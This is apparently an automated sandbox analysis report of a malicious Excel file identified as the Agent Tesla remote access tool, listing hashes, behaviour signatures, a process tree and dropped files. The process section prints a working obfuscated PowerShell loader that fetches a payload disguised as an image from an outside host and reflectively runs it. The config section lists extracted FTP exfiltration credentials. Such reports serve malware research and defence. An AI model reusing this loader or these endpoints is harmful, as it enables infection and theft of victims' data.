Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    30-04-2024 01:03

General

  • Target

    f294d7832d69140d5f66ec4b470ece30b2391a5c3963d9c065653a3bd051b2c9.xls

  • Size

    239KB

  • MD5

    8ee1652797610b6745b9a1999fa390ec

  • SHA1

    38582771a805391580f27ffa38cac43d5e6f110b

  • SHA256

    f294d7832d69140d5f66ec4b470ece30b2391a5c3963d9c065653a3bd051b2c9

  • SHA512

    42867adfb28c6df1b976dc58cb2136a2db1106b069419484e9c9d0dc9de079bad762a7273e02566842b63c0cb8c9a0cb9083dbb778878659109dad24b34e663d

  • SSDEEP

    6144:pd4UcLe0JOqPQZR8MDdATCR3tSv0W8FLB7ioAa:MUP/qPQZR8MxAm/S8W8FNA

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.fosna.net
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    =A+N^@~c]~#I

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 7 IoCs
  • Abuses OpenXML format to download file from external location
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f294d7832d69140d5f66ec4b470ece30b2391a5c3963d9c065653a3bd051b2c9.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1936
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2796
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1388
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1536
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mrningxla.js"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:296
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc3My84MTIvb3JpZ2luYWwvanMuanBnPzE3MTM4ODI3NzgnLCAnaHR0cHM6Ly91cGxvYWRkZWltYWdlbnMuY29tLmJyL2ltYWdlcy8wMDQvNzczLzgxMi9vcmlnaW5hbC9qcy5qcGc/MTcxMzg4Mjc3OCcpOyAkaW1hZ2VCeXRlcyA9IERvd25sb2FkRGF0YUZyb21MaW5rcyAkbGlua3M7IGlmICgkaW1hZ2VCeXRlcyAtbmUgJG51bGwpIHsgJGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbWFnZUJ5dGVzKTsgJHN0YXJ0RmxhZyA9ICc8PEJBU0U2NF9TVEFSVD4+JzsgJGVuZEZsYWcgPSAnPDxCQVNFNjRfRU5EPj4nOyAkc3RhcnRJbmRleCA9ICRpbWFnZVRleHQuSW5kZXhPZigkc3RhcnRGbGFnKTsgJGVuZEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRlbmRGbGFnKTsgaWYgKCRzdGFydEluZGV4IC1nZSAwIC1hbmQgJGVuZEluZGV4IC1ndCAkc3RhcnRJbmRleCkgeyAkc3RhcnRJbmRleCArPSAkc3RhcnRGbGFnLkxlbmd0aDsgJGJhc2U2NExlbmd0aCA9ICRlbmRJbmRleCAtICRzdGFydEluZGV4OyAkYmFzZTY0Q29tbWFuZCA9ICRpbWFnZVRleHQuU3Vic3RyaW5nKCRzdGFydEluZGV4LCAkYmFzZTY0TGVuZ3RoKTsgJGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGJhc2U2NENvbW1hbmQpOyAkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjb21tYW5kQnl0ZXMpOyAkdHlwZSA9ICRsb2FkZWRBc3NlbWJseS5HZXRUeXBlKCdQUk9KRVRPQVVUT01BQ0FPLlZCLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LjQ0NDQ2ZXphYi83Ny4wNi41OS4zMi8vOnB0dGgnICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nLCdBZGRJblByb2Nlc3MzMicsJ2Rlc2F0aXZhZG8nKSl9fQ==';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:608
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778', 'https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.44446ezab/77.06.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1584
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2836

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Exploitation for Client Execution

    1
    T1203

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      562afded92bba208440515aae4c964b5

      SHA1

      427ae571d2f69512a714b5f82cae04732a5d245e

      SHA256

      c043a9ea7845d25b84da5e470e337cc45bd741e96f4ddf3e304934c385a3473a

      SHA512

      a91764740d53fd9a1f0f452205f4d03bbb6c0a4b34106afbbde97a9691b3d2d36ae89982eb15b43eefa9d018b7a64b8663e7f0bfa4bc59cead231432e61d2a0a

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      632cf9d0f1955ba51c455d0bfe315f16

      SHA1

      ab94b30ef35687d5240d90ec96f4cc87b82f9e9a

      SHA256

      55423a1023a3c0b8d0249cc89db11b8896d9290b832c80c4eb1a1fce08a191f7

      SHA512

      cce98a61b88802fabd0bb8ccabd41af2428b16ca2589a40642c9757660fca24f784bfcf52cb9d94634a94f5ac4ea7330b6d14508e0755279e8f21b0028a26885

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{4DD8C38F-B1F2-4C59-91F4-D76C044C79C6}.FSD
      Filesize

      128KB

      MD5

      66f47c067bdbe8a4635c0682ad2b679d

      SHA1

      d8326dacd9d2dddc616f9f4103bc3504c67878e7

      SHA256

      96e3e1e828f9da1c94f7c1173b22ca9a48c407753db9d0a799d15ac3cfef7ab4

      SHA512

      438a7db6322bb7f4c8c31977f9395f94f2f3f78a55254b3128de902373b08055da7ae0e0aa2ad4adf5f7928dac7415fe1c38dff23d1746e74731c30fa011c9fc

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
      Filesize

      128KB

      MD5

      841379ea2a30ccb2fd6620ead56eeefd

      SHA1

      364a6eba39c186ce89db83064941475e96a8c455

      SHA256

      bd3302c8a2197b378285cba24a138f696cef1e553799b0b1b05e12c8d6ef3cb9

      SHA512

      920df4b2675fd8b1724c71ed2ae4b096cb0e0db62c344a89c47d83afdb4064e22b644321c8cf1252626a0b221ab85bab7c06bd00aeda562cdd1e1dcea45e0113

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{A3ED487A-EA64-42E1-806E-893EEE57A8AB}.FSD
      Filesize

      128KB

      MD5

      0b88fb8c1188498c6bd7055bd790b907

      SHA1

      775aec4fa606a2578b1956087d52491a3ab717aa

      SHA256

      12e7bb8720d84b4668052089c4feabb6dfad7d3d4c731e82933d61029190858d

      SHA512

      b55935c4bf3f4a204f6aa22cd4c8af64d5c835a0291e83cef59313b453e2f5fe0a5148e3925b0e85a47ed24525ef1146b533d549b567053bdf1a2a376003bb18

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\mrngwescreentherootforentirepurposehappenedwthhappinessskeisverybeatuiful___heisverygoodnadbeautiufl[1].doc
      Filesize

      65KB

      MD5

      23ca36b7cde550140f219bf20ed8a4ff

      SHA1

      1c8a9af53bd414ac55b21941cfe18f230a67b16a

      SHA256

      7738f4f6d42724e34b3aaadc6f5bdddda46910969686a19a472c00b73183e6de

      SHA512

      c9f93b38db0ab9349b16b3835652799be4a332d19d4f9267c897546a46bb71689a28ffcfa072165140126f04b085ce044d3b960bb8b27f1339222d6219d40a1e

    • C:\Users\Admin\AppData\Local\Temp\Cab2D38.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\Tar2D3B.tmp
      Filesize

      171KB

      MD5

      9c0c641c06238516f27941aa1166d427

      SHA1

      64cd549fb8cf014fcd9312aa7a5b023847b6c977

      SHA256

      4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

      SHA512

      936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    • C:\Users\Admin\AppData\Local\Temp\Tar2E1B.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Local\Temp\{5E690529-6F10-4AE8-A2EC-3D92E818F17B}
      Filesize

      128KB

      MD5

      03ce744d9143f21a5eb20da77651b1a1

      SHA1

      ba468f2325fc5296177471a478aa9fcf28a76a0f

      SHA256

      862ae66d0994353e22dc9a1623db1e77a50148f2ce961609522b3dd3d7604bae

      SHA512

      6cb9caeab29def6dd587899786ce439b053a1ac3b62fb1afb958a0b9bd32463d0e7cfa66990c79af8fa80b5a88d822a8163ada46364323e3e9fff36b8e6ae084

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      3b25409b843305b90b26fb00d98935ec

      SHA1

      207f8859be11cff0afa776f0b1bdd65568560f0b

      SHA256

      ba625087605f4d230082aa149abc5bd7796592970da23b9e79257303958a3da2

      SHA512

      857d43d0f71934a6c158a37a793a61c80f3dec9e5db69814e989f2b780323a810c07ad99626117b0bdb2d3db652c6ffb7379d8459eb75827940e28adf6e7c2b8

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      ac5d74bb20023ad6400e67d168764ea5

      SHA1

      e8c57103bdc96d329bcba07d83483154777c881c

      SHA256

      a95ec79f6c01fd3280701d0a1d3be4d06b14f4986835f088721e47ada9d9d770

      SHA512

      908bfa1251c4f2e504b272471cf33e8517b39fd25ae6433bd3ab9543362c9ad196e056ac8aa7eff1a97d84f31e3bdb5fe6c389d237ba60bdd96824c1430759ab

    • C:\Users\Admin\AppData\Roaming\mrningxla.js
      Filesize

      5KB

      MD5

      985c863cbfd963e82d62c04f882a7e1b

      SHA1

      09f830e538c6731e5ee917180c074d4fdc193996

      SHA256

      5e643224e66a692d5a82d3e4443cc221dd49e8b1b4a1602f95cc8424ee511670

      SHA512

      b3e0357c45e2e7b9bd8379e5584ae2e59c6390f1aaa7484a0fc40d588faaf85d5a6cb07c785ff9fadee88a883857f5f113f7e4b3ec22ee08bcc2d9b2aeeb285f

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • memory/1936-236-0x000000007285D000-0x0000000072868000-memory.dmp
      Filesize

      44KB

    • memory/1936-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1936-207-0x000000007285D000-0x0000000072868000-memory.dmp
      Filesize

      44KB

    • memory/1936-1-0x000000007285D000-0x0000000072868000-memory.dmp
      Filesize

      44KB

    • memory/1936-8-0x0000000002340000-0x0000000002342000-memory.dmp
      Filesize

      8KB

    • memory/2796-5-0x000000007285D000-0x0000000072868000-memory.dmp
      Filesize

      44KB

    • memory/2796-233-0x000000007285D000-0x0000000072868000-memory.dmp
      Filesize

      44KB

    • memory/2796-231-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2796-3-0x000000002F371000-0x000000002F372000-memory.dmp
      Filesize

      4KB

    • memory/2796-7-0x0000000003670000-0x0000000003672000-memory.dmp
      Filesize

      8KB

    • memory/2796-208-0x000000007285D000-0x0000000072868000-memory.dmp
      Filesize

      44KB

    • memory/2836-195-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/2836-197-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/2836-205-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/2836-206-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/2836-199-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/2836-201-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/2836-204-0x0000000000400000-0x0000000000442000-memory.dmp
      Filesize

      264KB

    • memory/2836-203-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
      Filesize

      4KB